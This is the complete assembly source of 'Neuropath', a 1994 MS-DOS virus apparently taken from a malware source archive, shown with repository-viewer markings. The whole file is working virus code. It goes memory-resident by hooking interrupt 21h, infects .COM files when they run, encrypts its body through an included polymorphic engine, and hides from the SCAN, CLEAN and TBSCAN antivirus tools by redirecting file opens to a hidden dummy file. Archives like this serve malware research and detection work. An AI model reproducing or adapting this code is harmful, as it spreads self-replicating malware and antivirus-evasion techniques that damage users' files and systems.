MalwareSourceCode/MSDOS/N-Index/Virus.MSDOS.Unknown.neuro.asm

287 lines
7.5 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; ========================================================================>
; [Neuropath] by MnemoniX 1994
;
; * Memory resident .COM infector
; * Polymorphic (engine in neuroeng.asm - lame but effective)
; * Anti-SCAN and CLEAN stealth technique - creates hidden file in
; root directory; when SCAN or CLEAN is run all attempts to open .COM
; files are redirected to hidden file, and they all come out clean.
; ========================================================================>
code segment
org 0
assume cs:code
start:
db 0E9h,0,0
virus_begin:
call $ + 3
pop bp
sub bp,offset $ - 1
mov ah,3Ch
mov cx,2
lea dx,[bp + dummy_file] ; create dummy file
int 21h
mov ah,3Eh
int 21h
install:
mov ax,5786h
int 21h
push ds es
mov ax,ds
dec ax
mov ds,ax
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupt 21
mov ds,ax
mov si,21h * 4
mov di,offset old_int_21
movsw
movsw
mov word ptr [si - 4],offset new_int_21
mov [si - 2],es
pop es ds
jmp install
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,5786h
je restore_host
cmp ah,4Ch
je terminate
cmp ah,3Dh
je file_open
not ax
cmp ax,0B4FFh
je execute
int_21_4B_exit:
not ax
int_21_exit:
db 0EAh
old_int_21 dd 0
restore_host:
pop ax
pop ax
push ds
mov di,0FEFFh
not di
lea si,[bp + host]
push di
movsw
movsb
iret
terminate:
mov cs:McAffee_alert,0
jmp int_21_exit
file_open:
cmp cs:McAffee_alert,1
jne int_21_exit
push ax si
mov si,dx
find_ext:
lodsb
cmp al,'.'
je ext_found
test al,al
je not_com
jmp find_ext
ext_found:
cmp ds:[si],'OC' ; .COM?
jne not_com
cmp byte ptr ds:[si + 2],'M'
jne not_com
pop si ax
push ds dx
push cs
pop ds
mov dx,offset dummy_file
call int_21
pop dx ds
retf 2
not_com:
pop si ax
jmp int_21_exit
execute:
push ax si
mov si,dx
find_ext_2:
lodsb
cmp al,'.'
je ext_found_2
test al,al
je no_scan
jmp find_ext_2
ext_found_2:
cmp ds:[si],'XE' ; check for SCAN.EXE
jne no_scan
cmp ds:[si - 3],'NA'
jne no_scan
cmp ds:[si - 5],'CS'
jne perhaps_clean
mcaffee_on:
pop si ax
mov cs:McAffee_alert,1 ; McAffee alert!
jmp int_21_4B_exit
perhaps_clean:
cmp ds:[si - 5],'EL' ; check for CLEAN.EXE
jne no_scan
cmp byte ptr ds:[si - 6],'C'
je mcaffee_on
no_scan:
pop si ax
push ax bx cx dx si di bp ds es
mov ax,3D00h
call int_21
jnc check_out
jmp cant_open
check_out:
xchg ax,bx
push cs
pop ds
push bx
mov ax,ds:sft_1
int 2Fh
mov ax,ds:sft_2
mov bl,es:[di]
int 2Fh
pop bx
mov word ptr es:[di + 2],2
mov ax,es:[di + 0Dh]
and al,31
cmp al,24 ; marker is 24
je dont_infect
mov ah,ds:file_read ; anti-TBSCAN
mov dx,offset host
mov cx,3
call int_21
mov ax,word ptr ds:host
sub ax,'ZM'
je dont_infect
mov ax,es:[di + 11h] ; file size
cmp ax,65278 - VIRUS_SIZE
jae dont_infect
mov es:[di + 15h],ax
sub ax,3
mov word ptr ds:new_jump + 1,ax
push es di bx
add ax,103h
xchg dx,ax
mov cx,VIRUS_SIZE
mov si,offset virus_begin
mov di,offset encrypt_buffer
push cs
pop es
call engine
pop bx di es
mov dx,offset encrypt_buffer
call write_it
mov word ptr es:[di + 15h],0
mov cx,3
mov dx,offset new_jump
call write_it
dont_infect:
mov ax,ds:set_date ; anti-TBSCAN
mov cx,es:[di + 0Dh]
mov dx,es:[di + 0Fh]
and cl,-32
or cl,24
call int_21
mov ah,3Eh
call int_21
cant_open:
pop es ds bp di si dx cx bx ax
jmp int_21_4B_exit
write_it:
mov ah,ds:file_write ; anti-TBSCAN
call int_21
ret
db '[Neuropath] MnemoniX',0
dummy_file db '\',-1,-1,0 ; 2 ASCII 255s
include neuroeng.asm
McAffee_alert db 0
host db 0CDh,20h,0
new_jump db 0E9h,0,0
set_date dw 5701h
file_read db 3Fh
file_write db 40h
sft_1 dw 1220h
sft_2 dw 1216h
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
encrypt_buffer db VIRUS_SIZE + 1000 dup (?)
heap_end:
MEM_SIZE equ heap_end - start
code ends
end start